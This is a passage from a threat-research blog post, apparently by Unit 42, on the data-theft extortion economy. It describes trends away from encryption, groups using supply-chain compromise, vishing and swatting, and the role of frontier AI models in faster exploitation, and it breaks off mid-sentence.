Threat Research Center Insights General General Out of the Crypt: The Evolving Cyber Extortion Economy 8 min read Related Products Unit 42 Frontier AI Defense Unit 42 Incident Response By: Matt Brady Justin Moore Published: May 27, 2026 Categories: Cybercrime General Insights Tags: Bling Libra Extortion Frontier AI Hazy Scorpius Scattered LAPSUS$ Hunters ShinyHunters Supply chain Telegram TGR-CRI-1135 Share Extortion Activity No Longer Requires Encryption for Payment This blog dives into the growing trend of data theft and extortion activities which no longer require the use of ransomware to pressure victims into paying a demand. We examine the financially-motivated threat actors using both single and double extortion techniques and what this means for organizations going forward, especially with the arrival of frontier AI models. Shifting Threat Landscape Observations As detailed in our 2026 Global Incident Response Report , Unit 42 observed a notable decrease in the use of encryption for extortion-related cases last year. The total percentage in 2025 dropped to 78%, much lower than the near-or-above-90% levels observed between 2021-2024. Other security organizations have seen similar trends, with Google reporting a gradual rise in data theft and extortion incidents from approximately 2% in 2020 to 15% in 2025. Resilience also observed an increase in extortion-only incidents in 2025, rising from 49% in the first half to 65% in the second half. Threat actors tracked by Unit 42 that have demonstrated a willingness to shift away from using ransomware to pure data theft and extortion include Bling Libra’s (aka ShinyHunters) focus on software-as-a-service (SaaS) applications and Hazy Scorpius’s (aka CLOP) exploitation of an Oracle EBS vulnerability . When examining this precipitous drop in encryption, we see four primary drivers: advanced backup and recovery performance allowing routine re-imaging and restoration, endpoint maturity and automated disruption efficacy, exfiltration speed and the increased pressure from regulatory frameworks where non-compliance fines, class-action lawsuits and systemic reputational damage are greater leverage than operational downtime. In 2025, pure data-exfiltration campaigns heavily targeted Professional Services, Healthcare and Consumer Services firms with threat actors specifically focused on mid-sized organizations accounting for 64% of victims. Interestingly, while Manufacturing remains the single most disrupted sector overall, Construction has witnessed a 44% year-over-year increase as a data-only extortion hotspot . These firms are attractive targets due to lucrative financial blueprints and bidding data combined with data egress controls. The current data-only extortion economy is directly fueled by a heavily-regulated compliance landscape, which threat actors have effectively weaponized. Strict mandates like the SEC's 4-day disclosure window and GDPR’s 72-hour reporting rule have created a regulatory countdown clock, allowing threat actors to force rapid negotiations before organizations can complete internal assessments. Because global privacy frameworks, state-level breach notification laws and post-leak class-action litigation have driven the average cost of data-theft extortion to $5.08 million (and over $10 million for broader U.S. breaches), data exposure alone carries disastrous financial liabilities. Threat actors recognize that regulatory penalties are so severe that the compliance framework itself compels corporate payouts. As recently noted by our Chief Security Intelligence Officer, Wendi Whitmore, it only took 39 seconds for threat actors to move from initial access to data exfiltration in one case. Differences in Extortion Operations Unit 42 is actively monitoring several threat actors that are continuously conducting data theft and extortion operations. The notable differences between these attackers is their use of initial access techniques and the number of extortion techniques to pressure victims into payment. Initial Access via Software Supply Chain Compromise TGR-CRI-1135 (aka TeamPCP) has been active since at least late 2025. According to Wired , this group has conducted upwards of 20 distinct supply chain compromise attacks which have led to the injection of malicious code into over 500 pieces of software. We previously reported on the group’s activities earlier this year and how their malware was able to successfully exfiltrate sensitive secrets (cloud access tokens, SSH keys, Kubernetes secrets) from victims. In recent months, TGR-CRI-1135 has been partnering with various ransomware-as-a-service (RaaS) and extortion-as-a-service (EaaS) operators to monetize their ongoing intrusion activities. On the EaaS front, they have been collaborating with the operators of LAPSUS$ Group to extort targeted organizations via their data leak site as shown below in Figure 1. Figure 1. Screenshot of LAPSUS$ DLS post on May 21, 2026. Source: Dark Web Informer. On the RaaS front, they have been working with the operators of Vect ransomware based on communications observed via the BreachForums cybercrime forum as shown in Figure 2. Unit 42 is also aware of claims by one of Vect’s affiliates, the Rostova Organization , that they are also partnering with TGR-CRI-1135. Figure 2. Screenshot from HasanBroker’s BreachForums post on March 25, 2026. Source: Unit 42. On May 13, 2026, TGR-CRI-1135 announced the release of an open source version of Shai-Hulud on BreachForums as shown in Figure 3. Going forward, as noted in our most recent threat research article , this will likely make attribution more difficult given that copycats may leverage the tool in similar supply chain compromise attacks. Figure 3. Screenshot from BreachForums post on May 13, 2026. Source: Unit 42. One notable development related to Vect was the announcement on BreachForums shown in Figure 4 which states that those operators have been removed from the forum. It is unclear if this will have a material effect on their collaboration with TGR-CRI-1135 going forward. Figure 4. Screenshot from Resolute’s BreachForums post on May 21, 2026. Source: Unit 42. At this time, Unit 42 is not aware of TGR-CRI-1135 using any additional extortion techniques to pressure victims into paying their ransom demands outside of purely data exfiltration. Initial Access via Vishing Bling Libra continues their rampage of infiltrating customer SaaS tenants for data theft and extortion operations, which Unit 42 reported on extensively in 2025 . The operators have distanced themselves from the cybercriminal alliance known as Scattered LAPSUS$ Hunters based on a Telegram message shown in Figure 5. Figure 5. Screenshot from scattered LAPSUS$ hunters part 7 chat on May 11, 2026. Source: Telegram. However, their playbook has remained relatively unchanged based on Unit 42 observations. They continue to use vishing for initial access, directing unsuspecting victims to phishing sites designed to intercept user credentials and multifactor authentication (MFA) codes and ultimately registering their own devices to establish persistence within targeted environments. The operators still use the same Tox ID to communicate with victims and also maintain a Tor-based data leak site. In comparison to TGR-CRI-1135, Bling Libra uses additional extortion techniques outside of pure data theft to pressure victims into paying a ransom. Unit 42 is aware of their adoption of both distributed denial-of-service (DDoS) attacks and information leaks to media outlets as added leverage points to extort victims. On the flip side, an activity cluster tracked by Unit 42 as CL-CRI-1116, which overlaps with public reporting on BlackFile, has followed a similar pattern of activity in terms of a playbook-driven approach with some subtle and not so subtle nuances. While the attackers behind CL-CRI-1116 also use their own Tor-based data leak site, they do not reuse the same Tox ID across victims and typically use a different registrar to set up their phishing sites in comparison to Bling Libra. The major difference between CL-CRI-1116 and Bling Libra is the former’s use of swatting employees as a double extortion technique. This act is typically defined as placing a false emergency call to first responders, such as reporting a fake crime at a specific location to trigger a physical response. In many cases, this is expected to create chaos and can potentially even lead to acts of violence. This convergence between cyber and physical security can lead to complications if these two teams aren’t in regular communications with each other on how to address such a situation, especially as it pertains to executive protection. One recent development regarding the attackers behind CL-CRI-1116 is the closure of their former data leak site and the rebranding of their program under the name “Redact” with a new data leak site as shown in Figures 6 and 7. Figure 6. Screenshot from BlackFile data leak site post on May 11, 2026. Source: Unit 42. Figure 7. Screenshot from BlackFile data leak site post on May 19, 2026. Source: Unit 42. Looking Forward In recent weeks, Palo Alto Networks has been at the forefront of providing guidance to organizations on how to secure their environments from the inevitable weaponization of frontier AI models like Mythos by threat actors. These models currently accelerate at finding and chaining vulnerabilities together to exploit flaws in applications and infrastructure alike. For example, Anthropic recently disclosed how Mythos was able to identify approximately 23,000 potential vulnerabilities across 1,000 open source software projects. We have also observed in AI-assisted scenarios that the time from initial access to data exfiltration has dropped to as little as 25 minutes . With this in mind, what do extortion activities, regardless of initial access vector or use of single vs double techniques, look like in the age of frontier AI models? In terms of softw